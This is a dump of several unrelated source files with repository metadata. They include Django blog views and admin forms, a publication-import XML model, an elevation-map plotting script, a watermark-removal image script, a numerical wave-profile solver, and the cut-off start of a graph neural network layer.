a1d445d782aac6e469879fd17abeb935b4bc2324 | b5ad47c2bc4bbb847540c7ecace86c316d29e8db | /blog/views.py | b3670a43eb5a23533c7abb01cc5feaa3104fb534 | [] | no_license | miguelgarcia18/my-first-blog | 76c0ce2f3bd6506a22b208396e33d77827cca764 | 6c9160a332b64d71e4fbe0aa08afd0d4e1fcad25 | refs/heads/master | 2023-01-19T07:09:35.660886 | 2020-11-18T04:06:52 | 2020-11-18T04:06:52 | 304,738,556 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,792 | py | from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from django.utils import timezone
from .models import Post, Comment
from django.shortcuts import render, get_object_or_404
from .forms import PostForm, CommentForm
# Create your views here.
def post_list(request):
posts = Post.objects.filter(published_date__lte=timezone.now()).order_by('published_date')
return render(request, 'blog/post_list.html', {'posts': posts})
def post_detail(request, pk):
post = get_object_or_404(Post, pk=pk)
return render(request, 'blog/post_detail.html', {'post': post})
@login_required
def post_new(request):
if request.method == "POST":
form = PostForm(request.POST)
if form.is_valid():
post = form.save(commit=False)
post.author = request.user
post.save()
return redirect('post_detail', pk=post.pk)
else:
form = PostForm()
return render(request, 'blog/post_edit.html', {'form': form})
@login_required
def post_edit(request, pk):
post = get_object_or_404(Post, pk=pk)
if request.method == "POST":
form = PostForm(request.POST, instance=post)
if form.is_valid():
post = form.save(commit=False)
post.author = request.user
post.save()
return redirect('post_detail', pk=post.pk)
else:
form = PostForm(instance=post)
return render(request, 'blog/post_edit.html', {'form': form})
@login_required
def post_draft_list(request):
posts = Post.objects.filter(published_date__isnull=True).order_by('created_date')
return render(request, 'blog/post_draft_list.html', {'posts': posts})
@login_required
def post_publish(request, pk):
post = get_object_or_404(Post, pk=pk)
post.publish()
return redirect('post_detail', pk=pk)
@login_required
def post_remove(request, pk):
post = get_object_or_404(Post, pk=pk)
post.delete()
return redirect('post_list')
def add_comment_to_post(request, pk):
post = get_object_or_404(Post, pk=pk)
if request.method == "POST":
form = CommentForm(request.POST)
if form.is_valid():
comment = form.save(commit=False)
comment.post = post
comment.save()
return redirect('post_detail', pk=post.pk)
else:
form = CommentForm()
return render(request, 'blog/add_comment_to_post.html', {'form': form})
@login_required
def comment_approve(request, pk):
comment = get_object_or_404(Comment, pk=pk)
comment.approve()
return redirect('post_detail', pk=comment.post.pk)
@login_required
def comment_remove(request, pk):
comment = get_object_or_404(Comment, pk=pk)
comment.delete()
return redirect('post_detail', pk=comment.post.pk)
| [
"agarcia38@uabc.edu.mx"
] | agarcia38@uabc.edu.mx |
08b1e56759630fcea5127b62eaa611f2bf6e9ede | 6fdf73a4a2a9ad67f1f659332e46e92b1d02be20 | /build/youbot_description/catkin_generated/pkg.develspace.context.pc.py | 4cc34b216a670dcafc24a5ac494ae935084a8334 | [] | no_license | Spain2394/Extended-Kalman-ROS | 840e73a7e7196d6ff795bb0a6783129d5c166980 | 5d63719d6b5bbb13c318bb4841f53e2cc2102781 | refs/heads/master | 2020-03-31T19:02:01.426237 | 2018-11-06T22:06:18 | 2018-11-06T22:06:18 | 152,482,222 | 0 | 3 | null | 2018-10-16T20:30:37 | 2018-10-10T19:59:30 | Makefile | UTF-8 | Python | false | false | 393 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "youbot_description"
PROJECT_SPACE_DIR = "/home/parallels/Extended-Kalman-ROS/devel"
PROJECT_VERSION = "0.8.1"
| [
"aspain2394@gmailom"
] | aspain2394@gmailom |
1bb735e0fd1deee9b38800cc31038c19a6a092b1 | 2fa3be801aefa55fc7418bad9fa10a9a6a9542cf | /bookstore1/store/migrations/0017_auto_20210227_1440.py | 778107011c6355f0e5a9f1de38467d3dba87c1c2 | [] | no_license | dhruvijivani/Django_book_store | 24810d5732e0edfaee423a2cd06ff6d1d5994a53 | ee3fbb3a1aff0295c6884b5e0ff0c01f0d9f3a33 | refs/heads/master | 2023-03-28T16:19:45.043480 | 2021-03-31T13:51:26 | 2021-03-31T13:51:26 | 353,255,354 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 376 | py | # Generated by Django 3.1.5 on 2021-02-27 09:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('store', '0016_bookreview'),
]
operations = [
migrations.AlterField(
model_name='bookreview',
name='stars',
field=models.FloatField(default=1),
),
]
| [
"dhruvijivani456@gmail.com"
] | dhruvijivani456@gmail.com |
526e3e00db493a51c593fccbce1531779d7614d2 | e7f2375f047673876c6a3efcf00ecc256f969b71 | /tests/__init__.py | eff650c6ae0df1b46ff6c510d337b6343bda3ffc | [
"Apache-2.0",
"MIT"
] | permissive | 7pairs/twingo | 31ff7675e6c0c420eefb0985ca959ab7cbf0fb4e | b81347dfdb0a7bb5f7f49bde39a9dd0a2d3aa7d6 | refs/heads/master | 2020-12-24T13:44:47.093096 | 2019-04-07T03:04:25 | 2019-04-07T03:10:48 | 19,700,263 | 0 | 0 | Apache-2.0 | 2019-11-01T13:41:25 | 2014-05-12T13:43:08 | Python | UTF-8 | Python | false | false | 611 | py | # -*- coding: utf-8 -*-
#
# Copyright 2015-2019 Jun-ya HASEBA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
| [
"7pairs@gmail.com"
] | 7pairs@gmail.com |
33d79d2f5595988091164be65f8e5d729905be9f | d656adb8de93c5a9fff7d91eaba9d37258b9be1c | /openemory/publication/symp_import.py | 7402e98c1f6ce40f0448c7970b637bce489b2cdd | [
"Apache-2.0"
] | permissive | emory-libraries/OpenEmory | cf9bb3da61a3cf2c2d4db4e274095faffbb6a80e | 889444bc97f784e516f088016e48a53b381ce2c5 | refs/heads/master | 2023-07-25T00:32:09.266768 | 2023-07-17T14:42:45 | 2023-07-17T14:42:45 | 8,471,248 | 1 | 1 | null | 2023-08-16T18:11:15 | 2013-02-28T03:37:19 | Python | UTF-8 | Python | false | false | 5,990 | py | from eulxml import xmlmap
from django.conf import settings
# Symplectic Import Models
class SympBase(xmlmap.XmlObject):
'''
Base class for Symplectic-Elements xml
'''
api_ns = 'http://www.symplectic.co.uk/publications/api'
atom_ns = 'http://www.w3.org/2005/Atom'
ROOT_NAMESPACES = {'api': api_ns, 'atom': atom_ns}
ROOT_NS = api_ns
XSD_SCHEMA = settings.BASE_DIR + '/publication/symp-api46.xsd'
class SympEntry(SympBase):
'''Minimal wrapper for Symplectic-Elements article'''
ROOT_NS = 'http://www.w3.org/2005/Atom'
ROOT_NAME = 'entry'
source = xmlmap.StringField("(api:object/api:records/api:record/@source-name)[1]")
'''first symplectic source of publication'''
source_id = xmlmap.StringField("(api:object/api:records/api:record/@id-at-source)[1]")
'''id in first symplectic source'''
title = xmlmap.StringField('atom:title')
'''title of article'''
class SympOEImportPublication(SympBase):
'''Minimal wrapper for Symplectic-Elements articles being imported into OE'''
ROOT_NS = 'http://www.w3.org/2005/Atom'
ROOT_NAME = 'feed'
entries = xmlmap.NodeListField('atom:entry', SympEntry)
'''List of Articles'''
#TODO Remaining feilds that needto be found
# Authors (FN, LN, AFF, netids for owners)
# Article Version
# Import into Symplectic-Elements
class SympPerson(SympBase):
'''Person Info'''
ROOT_NAME = 'person'
last_name = xmlmap.StringField('api:last-name')
'''Last name of person'''
initials = xmlmap.StringField('api:initials')
'''Initials of person'''
class SympDate(SympBase):
'''Date Info'''
ROOT_NAME = 'date'
day = xmlmap.StringField('api:day')
'''Day portion of date'''
month = xmlmap.StringField('api:month')
'''Month portion of date'''
year = xmlmap.StringField('api:year')
'''Year portion of date'''
class SympWarning(SympBase):
'''Warning returned from publication creation'''
ROOT_NAME = 'warning'
message = xmlmap.StringField("text()")
'''Warning message'''
class OESympImportPublication(SympBase):
'''Minimal wrapper for Symplectic-Elements articles being imported from OE'''
ROOT_NAME = 'import-record'
types = xmlmap.StringListField("api:native/api:field[@name='types']/api:items/api:item")
'''Subtype of publication (defaults to Article)'''
type_id = xmlmap.StringField("@type-id")
'''Type Id of Article (defaults to 5)'''
title = xmlmap.StringField("api:native/api:field[@name='title']/api:text")
'''Title of Article'''
language = xmlmap.StringField("api:native/api:field[@name='language']/api:text")
'''Language of Article'''
abstract = xmlmap.StringField("api:native/api:field[@name='abstract']/api:text")
'''Abstract of Article'''
volume = xmlmap.StringField("api:native/api:field[@name='volume']/api:text")
'''Volume of Article'''
issue = xmlmap.StringField("api:native/api:field[@name='issue']/api:text")
'''Volume of Article'''
publisher = xmlmap.StringField("api:native/api:field[@name='publisher']/api:text")
'''Publisher of Article'''
publisher = xmlmap.StringField("api:native/api:field[@name='publisher']/api:text")
'''Publisher of Article'''
publication_date = xmlmap.NodeField("api:native/api:field[@name='publication-date']/api:date", SympDate)
'''Date of publication of Article'''
authors = xmlmap.NodeListField("api:native/api:field[@name='authors']/api:people/api:person", SympPerson)
'''Authors associated with Article'''
doi = xmlmap.StringField("api:native/api:field[@name='doi']/api:text")
'''DOI of Article'''
keywords = xmlmap.StringListField("api:native/api:field[@name='keywords']/api:keywords/api:keyword")
'''Keywords of Article'''
journal = xmlmap.StringField("api:native/api:field[@name='journal']/api:text")
'''Journal Name in which the Article appears'''
notes = xmlmap.StringField("api:native/api:field[@name='notes']/api:text")
'''Author Notes on the Article'''
pmcid = xmlmap.StringField("api:native/api:field[@name='external-identifiers']/api:identifiers/api:identifier[@scheme='pmc']")
'''PMCID Article appears'''
warnings = xmlmap.NodeListField('//api:warning', SympWarning)
'''Warning returned after publication creation'''
entries = xmlmap.NodeListField('//atom:entry', SympEntry)
'''entries returned from query'''
def __init__(self, *args, **kwargs):
super(OESympImportPublication, self).__init__(*args, **kwargs)
self.type_id = 5
self.types = ["Article","Book","Chapter","Conference","Poster","Dataset"]
def is_empty(self):
"""Returns True if all fields are empty, and no attributes
other than **type_id** . False if any fields
are not empty."""
# ignore these fields when checking if a related item is empty
ignore = ['type_id', 'types'] # type attributes
for name in self._fields.keys():
if name in ignore:
continue
f = getattr(self, name)
# if this is an XmlObject or NodeListField with an
# is_empty method, rely on that
if hasattr(f, 'is_empty'):
if not f.is_empty():
return False
# if this is a list or value field (int, string), check if empty
elif not (f is None or f == '' or f == []):
return False
# no non-empty non-ignored fields were found - return True
return True
class SympRelation(SympBase):
'''Minimal wrapper for Symplectic-Elements relation being imported from OE'''
ROOT_NAME = 'import-relationship'
# Types of relations
PUB_AUTHOR = 'publication-user-authorship'
from_object = xmlmap.StringField("api:from-object")
to_object = xmlmap.StringField("api:to-object")
type_name = xmlmap.StringField("api:type-name")
'''Relation type''' | [
"alexandr.zotov@emory.edu"
] | alexandr.zotov@emory.edu |
da4336d60fedd558631c28d01057f746f8c5b86b | de6bfbf5557a562cd816f7b0b4bd4b9fa9257d76 | /tezina/admin.py | 86b0c6d14089d5b35d1c2c792b1b8c99a7a50dd8 | [] | no_license | SavkeBG/Za_Miljana | 6ef27ce9720b1cba71093c2b4a5ec5b6b3517d61 | e41c28864b6ecf785820abe76d0605531b075200 | refs/heads/master | 2020-12-15T01:11:16.365605 | 2020-05-20T14:35:51 | 2020-05-20T14:35:51 | 259,031,392 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,205 | py | from django import forms
from django.contrib import admin
from django.contrib.auth.models import Group
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.contrib.auth.forms import ReadOnlyPasswordHashField
from tezina.forms import UserForm
from tezina.models import MyUser,Data
class UserCreationForm(forms.ModelForm):
"""A form for creating new users. Includes all the required
fields, plus a repeated password."""
password1 = forms.CharField(label='Password', widget=forms.PasswordInput)
password2 = forms.CharField(label='Password confirmation', widget=forms.PasswordInput)
class Meta:
model = MyUser
fields = ('email', 'first_name','last_name')
def clean_password2(self):
# Check that the two password entries match
password1 = self.cleaned_data.get("password1")
password2 = self.cleaned_data.get("password2")
if password1 and password2 and password1 != password2:
raise forms.ValidationError("Passwords don't match")
return password2
def save(self, commit=True):
# Save the provided password in hashed format
user = super().save(commit=False)
user.set_password(self.cleaned_data["password1"])
if commit:
user.save()
return user
class UserChangeForm(forms.ModelForm):
"""A form for updating users. Includes all the fields on
the user, but replaces the password field with admin's
password hash display field.
"""
password = ReadOnlyPasswordHashField()
class Meta:
model = MyUser
fields = ('email', 'password', 'first_name','last_name', 'is_active', 'is_admin')
def clean_password(self):
# Regardless of what the user provides, return the initial value.
# This is done here, rather than on the field, because the
# field does not have access to the initial value
return self.initial["password"]
class UserAdmin(BaseUserAdmin):
# The forms to add and change user instances
form = UserChangeForm
add_form = UserCreationForm
# The fields to be used in displaying the User model.
# These override the definitions on the base UserAdmin
# that reference specific fields on auth.User.
list_display = ('email', 'first_name','last_name', 'is_admin')
list_filter = ('is_admin',)
fieldsets = (
(None, {'fields': ('email', 'password')}),
('Personal info', {'fields': ('first_name', 'last_name',)}),
('Permissions', {'fields': ('is_admin',)}),
)
# add_fieldsets is not a standard ModelAdmin attribute. UserAdmin
# overrides get_fieldsets to use this attribute when creating a user.
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email', 'first_name', 'last_name', 'password1', 'password2'),
}),
)
search_fields = ('email',)
ordering = ('email',)
filter_horizontal = ()
# Now register the new UserAdmin...
admin.site.register(MyUser,UserAdmin)
admin.site.register(Data)
# ... and, since we're not using Django's built-in permissions,
# unregister the Group model from admin.
admin.site.unregister(Group)
| [
"60061747+SavkeBG@users.noreply.github.com"
] | 60061747+SavkeBG@users.noreply.github.com |
8cbe4de82e8973e9de229af929a25871f3a061bc | 20d54e88dbdab0a0335f6ae4bad22117e14eb556 | /src/py3/srtmTest.py | 475a6f72cca4bfec1cea1366608b23bc1b003792 | [] | no_license | bjohan/GnuradioTransceiver | ebf0426aabf5be4e06a52ac7a8ce941e14341ea7 | 501d68f78e40931f2f9549ab1ae1982faae464c6 | refs/heads/master | 2021-01-11T03:36:48.162992 | 2020-05-17T21:15:19 | 2020-05-17T21:15:19 | 70,995,273 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 606 | py | import matplotlib.pyplot as plt
import numpy as np
import srtmData
import heightResampler
sd = srtmData.SrtmData()
hr = heightResampler.HeightResampler(sd)
e, x, y = sd.getBlock(12, 57)
print(x)
print(y)
#plt.figure(1)
#plt.imshow(np.clip(e, 0, 10000), extent=[x[0], x[-1], y[-1], y[0]])
plt.figure(2)
xr = np.linspace(-180,180,500*2)
yr = np.linspace(-60,60,500)
#xr = np.linspace(12,14,500)
#yr = np.linspace(57,59,500)
#australia
#xr = np.linspace(110,155,10000)
#yr = np.linspace(-45,-10,5000)
rs = hr.get(xr, yr)
plt.imshow(np.clip(rs,0,10000), extent=[xr[0], xr[-1], yr[0], yr[-1]])
plt.show()
| [
"you@example.com"
] | you@example.com |
11c5f5a44aa9b30dfabc72fe4bab7220475ad937 | 69856ac8d1dcdde6fc44abd09cbc8e5911949486 | /remove_water_mark.py | 853a6f9f29c9883bb04591c9effd29842f54daab | [] | no_license | Bigmai-1234/remove_water_mark | 3d10816580599b5e090ff0c61e080fe5bef415e2 | 317126ac6b7222e2da410b3c7ae8fe2f039de1ac | refs/heads/master | 2022-12-01T15:15:29.809582 | 2020-08-20T09:28:34 | 2020-08-20T09:28:34 | 288,961,211 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,165 | py | import cv2
import numpy as np
import os
def move_mark(slices,percentile_ratio):
hight, width, depth = slices.shape[0:3]
sum_ = slices.sum(2)
t = list(set(list(np.array(sum_).flat)))
qual = np.percentile(t,percentile_ratio)
for h in range(hight):
for w in range(width):
if sum_[h][w] > qual:
slices[h][w] = [255,255,255]
return slices
def sliding_window(image, stepSize, windowSize):
# slide a window across the image
for y in range(0, image.shape[0], stepSize[1]):
for x in range(0, image.shape[1], stepSize[0]):
# yield the current window
yield (x, y, image[y:y + windowSize[1], x:x + windowSize[0]])
# 返回滑动窗结果集合,本示例暂时未用到
def get_slice(image, stepSize, windowSize):
slice_sets = []
for (x, y, window) in sliding_window(image, stepSize, windowSize):
# if the window does not meet our desired window size, ignore it
if window.shape[0] != windowSize[1] or window.shape[1] != windowSize[0]:
continue
slice = image[y:y + windowSize[1], x:x + windowSize[0]]
slice_sets.append(slice)
return slice_sets
def do_remove_mark(image,percentile_ratio,size_):
# 自定义滑动窗口的大小
w = image.shape[1]
h = image.shape[0]
# 本代码将图片分为3×3,共九个子区域,winW, winH和stepSize可自行更改
(winW, winH) = (int(w/size_),int(h/size_))
stepSize = (int(w/size_), int(h/size_))
for (x, y, window) in sliding_window(image, stepSize=stepSize, windowSize=(winW, winH)):
# if the window does not meet our desired window size, ignore it
if window.shape[0] != winH or window.shape[1] != winW:
continue
slice = image[y:y+winH,x:x+winW]
image[y:y+winH,x:x+winW] = move_mark(slice,percentile_ratio)
return image
# TODO
# path = "./train/1/"
# for img_ in os.listdir(path):
# if img_[-3:] != "png":continue
# image = cv2.imread(path + img_)
# img = do_remove_mark(image,50,500)
# img = do_remove_mark(img,50,3)
# cv2.imwrite("./trainres/" + img_,img)
| [
"noreply@github.com"
] | noreply@github.com |
50b96baeea9e8f562f0e5e8956dbf533ee376afa | 4a7bb7151259b5390100bd0d385a02fb8aa376b2 | /stablab/wave_profile.py | ab128f1c79c8c45a8b8d6deee20fbdbd95bf8401 | [
"MIT"
] | permissive | nonlinear-waves/stablab_python | 5c184382d4c847b884043268af4234380f8cccc0 | 101724f8bcefc34e90cf70d0813919188e08cb8a | refs/heads/master | 2021-01-10T05:46:55.316165 | 2019-09-12T14:51:05 | 2019-09-12T14:51:05 | 52,907,189 | 2 | 5 | MIT | 2019-09-25T02:31:56 | 2016-03-01T20:22:55 | Jupyter Notebook | UTF-8 | Python | false | false | 13,299 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 19 10:02:46 2017
@author: Taylor Paskett
This file is a translation into PYTHON of the folder bin_profile from the
MATLAB version of STABLAB
"""
import numpy as np
import scipy.linalg as scipylin
from scipy.integrate import solve_bvp
def profile_flux(p,s,s_old=None):
"""
# Solves the profile for the flux formulation.
# If s.s_old exists, then this
# is used for the initial guess. Otherwise, a tanh
# solution is used for an initial guess. Left and right
# numerical infinity are expanded as needed to assure
# the end state error is within s.tol, though s.L = s.R
# in this program, which may not be necessary. Uneeded
# mesh points of the solution are removed to speed up
# interpolation and continuation routines.
#
# The user must include in the input structures the following:
#
# s.phase - a vector of phase conditions
# s.order - a vector indicating the order in which the phase
# conditions should be applied.
# s.F - a function handle to the profile, e.g. s.F = @F, F(x,y,s,p) = ...
# s.UL, UR - end states of the n-r equations that need to be solved in
# flux formulation. UL at - infinity, UR at + infinity
# s.n = n-r in flux formulation (number of profile equations to integrate)
#
# Optional input:
# s.tol - profile endstate maxim absolute error, (defaults to 1e-4)
# s.R_max - maximum allowed interval length on right (defaults to 100)
# s.L_max - maximum allowed interval length on left (defaults to 100)
"""
#------------------------------------------------------------
# End states
#------------------------------------------------------------
# end state tolerance
if 'tol' not in s:
s['tol'] = 1e-4
# default for maximum value of R
if 'R_max' not in s:
s['R_max'] = 100
# default for maximum value of L
if 'L_max' not in s:
s['L_max'] = 100
# numerical infinity
s['I'] = 1
# profile solved on right half domain
s['side'] = 1
# array for right hand side
s['rarray'] = np.array(range(s['n']))
# array for left hand side
s['larray'] = np.array(range(s['n'],2*s['n']))
# bvp solver projections
A_min = s['Flinear'](s['UL'],p)
s['LM'] = scipylin.orth(projection(A_min,-1,0)) # Removed .T inside orth
A_plus = s['Flinear'](s['UR'],p)
s['LP'] = scipylin.orth(projection(A_plus,1,0)) # Removed .T inside orth
# This gives us the number of phase conditions needed
s['n_phs'] = s['n']-s['LM'].shape[1]-s['LP'].shape[1]
if s['n_phs'] < 1:
print("Eigenvalues at negative infinity: ")
print(np.linalg.eigvals(A_min))
print("Eigenvalues at positive infinity: ")
print(np.linalg.eigvals(A_plus))
raise ValueError("profile_flux.m does not solve undercompressive profiles")
# bvp tolerances
if 'bvp_options' not in s:
s['bvp_options'] = {'Tol': 1e-5,'Nmax': 2000}
elif 'Nmax' not in s['bvp_options']:
s['bvp_options']['Nmax'] = 2000
elif 'Tol' not in s['bvp_options']:
s['bvp_options']['Tol'] = 1e-5
# tol and max_nodes
# positive numerical infinity
# -----------------------------------------------------------
# solve the profile initially
# -----------------------------------------------------------
p,s = profile(p,s,s_old)
# -----------------------------------------------------------
# take out extra mesh points
# -----------------------------------------------------------
# stride = how many points to take out of solution to
# minimize points in final solution.
stride = 3
s['stride'] = stride
s_old = s
mesh = len(s_old['sol'].x)
mesh_old = mesh+1
while mesh < mesh_old:
p,s = profile(p,s,s_old)
s_old = s
mesh_old = mesh
mesh = len(s_old['sol'].x)
s['stride'] = stride
return p,s
def profile(p,s,s_old):
#--------------------------------------------------------------------------
# provide initial guess
#--------------------------------------------------------------------------
if isinstance(s_old, dict):
if 'solver' in s_old:
if s_old['solver'] == 'bvp':
pre_guess = lambda x: continuation_guess(x,s_old,s)
else:
pre_guess = lambda x: ode_to_bvp_guess(x,s_old,s)
s['stride'] = 3
else:
pre_guess = lambda x: continuation_guess(x,s_old,s)
stride = s_old['stride']
x_dom = s_old['sol'].x[::stride].copy() # do I need the .copy() ?
if (len(s_old['sol'].x)-1) % stride != 0:
x_dom[-1] = s_old['sol'].x[-1]
s['I'] = s_old['I']
s['L']= s_old['L']
s['R'] = s_old['R']
else:
s['I'] = 1
if 'R' not in s:
s['R'] = 5
s['L'] = -s['R']
pre_guess = lambda x: guess(x,s)
x_dom = np.linspace(0,1,30)
#--------------------------------------------------------------------------
# convergence to endstates tolerance
#--------------------------------------------------------------------------
err = s['tol'] + 1
while err > s['tol']:
pre_bc = lambda x,y: bc(x,y,s)
pre_ode = lambda x,y: double_F(x,y,s,p)
initGuess = np.array([pre_guess(x) for x in x_dom],dtype=np.complex).T
s['sol'] = solve_bvp(pre_ode,pre_bc,x_dom,initGuess,
tol=s['bvp_options']['Tol'],
max_nodes=s['bvp_options']['Nmax'])
err1 = np.max(np.abs(s['sol'].y[s['rarray'],-1] - s['UR']))
err2 = np.max(np.abs(s['sol'].y[s['larray'],-1] - s['UL']))
err = max(err1,err2)
if 'stats' in s:
if s['stats'] == 'on':
print("Profile boundary error: ",err)
if err > s['tol']:
s_old = s
if err1 > s['tol']:
s['R'] *= 1.1#*s['R']
s['L'] = -s['R']
if err2 > s['tol']:
s['L'] *= 1.1#*s.L;
s['R'] = -s['L']
if abs(s['L']) > s['L_max']:
raise ValueError("""Could not meet specified tolerance in profile solver
without exceeding the maximum allowed value of negative infinity.""")
if abs(s['R']) > s['R_max']:
raise ValueError("""Could not meet specified tolerance in profile solver
without exceeding the maximum allowed value of positive infinity.""")
if err > s['tol']:
pre_guess = lambda x: continuation_guess(x,s_old,s)
x_dom = s_old['sol'].x
return p,s
def guess(x,s):
# guess using tanh solution
a = 0.5*(s['UL']+s['UR'])
c = 0.5*(s['UL']-s['UR'])
outVector = np.concatenate([a-c*np.tanh((s['R']/s['I'])*x),
a-c*np.tanh((s['L']/s['I'])*x)])
return outVector
def bc(ya,yb,s):
# Boundary conditions. We split the problem in half and reflect onto
# the right side
outVector = np.concatenate([
ya[s['rarray']]-ya[s['larray']], # matching conditions
np.dot(s['LM'].T , (yb[s['larray']] - s['UL'])), # projection at - infinity
np.dot(s['LP'].T , (yb[s['rarray']] - s['UR'])), # projection at + infinity
ya[s['order'][0:s['n_phs']]]-s['phase'][s['order'][:s['n_phs']]] # Phase conditions
])
return outVector
def ode_to_bvp_guess(x,s_old,s):
out = np.array([[ deval(s_old['sol'],(s.R/s.I)*x)],
[ deval(s_old['sol'],(s.L/s.I)*x)]],dtype=np.complex)
return out
def continuation_guess(x,s_old,s_new):
"""
# Ouput gives initial guess for boundary value solver at x where s_old is
# the standard stablab structure s for the previously solved boundary value
# solution and s_new is that for the solution being solved. If v is the
# solution corresponding to s_new and y is the solution corresponding to
# s_old, continuation_guess yields as output v=a*y+b done componenet wise
# to allow phase conditions to be specified and so v matches its end
# states.
"""
y = deval(x,s_old['sol'])
out = np.zeros((len(y)),dtype=np.complex)
# coefficients for the guess for the new function v \approx a*y+b done
# componentswise. Positive infinity corresponds to the first column of the
# coefficeint matrices, and negative infinity corresponds to the second
# column of coefficient matrices.
a = np.zeros((len(s_old['rarray']),2),dtype=np.complex)
b = np.zeros((len(s_old['rarray']),2),dtype=np.complex)
# find scaling coefficients
for j in range(len(s_old['rarray'])):
# determine if the phase condition should be specified for the jth
# component
specify_phase = False
for k in range(len(s_new['order'])):
if j == s_new['order'][k]:
specify_phase = True
phase_index = j # Changed to j from k
# determine coefficients based on type
vminus = s_new['UL'][j]
vplus = s_new['UR'][j]
yminus = s_old['UL'][j]
yplus = s_old['UR'][j]
if specify_phase: # case where the phase condition is specified
vnot = s_new['phase'][phase_index]
ynot = s_old['phase'][phase_index]
vec = np.dot(np.linalg.inv(np.array([[yplus,1,0,0],
[ynot,1,0,0],[0,0,yminus,1],[0,0,ynot,1]])),
np.array([[vplus],[vnot],[vminus],[vnot]],
dtype=np.complex))
a[j,0] = vec[0]
b[j,0] = vec[1]
a[j,1] = vec[2]
b[j,1] = vec[3]
else: # case where the phase condition is not specified
if yplus == yminus:
a[j,0]=1
b[j,0]=0
a[j,1]=1
b[j,1]=0
else:
vec = np.dot(np.linalg.inv(np.array([[yplus,1],
[yminus,1]],dtype=np.complex)),
np.array([[vplus],[vminus]],dtype=np.complex))
a[j,0] = vec[0]
b[j,0] = vec[1]
a[j,1] = vec[0]
b[j,1] = vec[1]
# make the affine transformation, v=a*y+b
out[s_old['rarray']] = a[:,0]*y[s_old['rarray']]+b[:,0]
out[s_old['larray']] = a[:,1]*y[s_old['larray']]+b[:,1]
return out
def double_F(x,y,s,p,otherargs=None):
"""
# out = double_F(x,y,s,p)
#
# Returns the split domain for the ode given in the function F.
#
# Input "x" and "y" are provided by the ode solver.Note that s.rarray
# should be [1,2,...,k] and s.larray should be [k+1,k+2,...,2k]. See
# STABLAB documentation for more information about the structure s.
"""
if otherargs is not None:
out = np.vstack([(s['R']/s['I'])*s['F']((s['R']/s['I'])*x,
y[s['rarray'],:],s,p,otherargs),
(s['L']/s['I'])*s['F']((s['L']/s['I'])*x,
y[s['larray'],:],s,p,otherargs)])
else:
out = np.vstack([(s['R']/s['I'])*s['F']((s['R']/s['I'])*x,
y[s['rarray'],:],s,p),
(s['L']/s['I'])*s['F']((s['L']/s['I'])*x,
y[s['larray'],:],s,p)])
return out
def projection(matrix,posneg,eps):
"""
"""
D,R = np.linalg.eig(matrix)
L = np.linalg.inv(R)
P = np.zeros(R.shape,dtype=np.complex)
if posneg == 1:
index = np.where(np.real(D) > eps)
elif posneg == -1:
index = np.where(np.real(D) < eps)
elif posneg == 0:
index = np.where(np.abs(np.real(D)) < eps)
for j in index:
P = P + np.dot(R[:,j],L[j,:])
Q = np.concatenate([np.dot(P,R[:,j]) for j in index])
out = np.concatenate([P,Q],axis=1)
return P
def deval(x,solStruct):
"""
Takes two inputs, x and solStruct, and returns the y values corresponding
to the x values
"""
return solStruct.sol(x).real
def soln(xArray,s):
"""
# out = soln(x,s)
#
# Returns the solution of bvp problem where the domain was split in half
#
# Input "x" is the value where the solution is evaluated and "s" is a
# stucture described in the STABLAB documenation
"""
if isinstance(xArray,(float, int)):
outVector = np.zeros((1,s['n']))
if xArray < 0:
xArray = s['side']*s['I']/s['L']*xArray
temp = deval(xArray,s['sol'])
outVector = temp[s['larray']]
else:
xArray = s['side']*s['I']/s['R']*xArray
temp = deval(xArray,s['sol'])
outVector = temp[s['rarray']]
else:
outVector = np.zeros((len(xArray),s['n']))
for index,x in enumerate(xArray):
if x < 0:
x = s['side']*s['I']/s['L']*x
temp = deval(x,s['sol'])
outVector[index] = temp[s['larray']]
else:
x = s['side']*s['I']/s['R']*x
temp = deval(x,s['sol'])
outVector[index] = temp[s['rarray']]
return outVector.real
| [
"taylor.paskett@gmail.com"
] | taylor.paskett@gmail.com |
920828613ae5a1da0f018049610070c91b9fc58b | 9076766a8d7751bc5802600d417d1316386d36d5 | /nn/conv/tenet.py | 973c888491bdc00d3a6a5821d4862ea91e2d6889 | [] | no_license | convei-lab/torch_geometric | 2cdd1b2df43426cb02f39fd6c588a1c9a4293688 | 84ef9b96331a6c72647b2b1c8026a27ba1a9488c | refs/heads/main | 2023-04-27T09:04:45.561276 | 2021-05-24T03:03:33 | 2021-05-24T03:03:33 | 323,888,438 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,052 | py | from operator import ne, neg
from typing import Optional, Tuple
from torch_geometric.typing import Adj, OptTensor, PairTensor
import torch
from torch import Tensor
import torch.nn as nn
from torch.nn import Parameter, BCEWithLogitsLoss
from torch_scatter import scatter_add
from torch_sparse import SparseTensor, matmul, fill_diag, sum as sparse_sum, mul
from torch_geometric.utils import add_remaining_self_loops, negative_sampling
from torch_geometric.utils.num_nodes import maybe_num_nodes
import torch_geometric.nn.inits as tgi
from torch.nn import functional as F
@torch.jit._overload
def gcn_norm(edge_index, edge_weight=None, num_nodes=None, improved=False,
add_self_loops=True, dtype=None):
# type: (Tensor, OptTensor, Optional[int], bool, bool, Optional[int]) -> PairTensor # noqa
pass
@torch.jit._overload
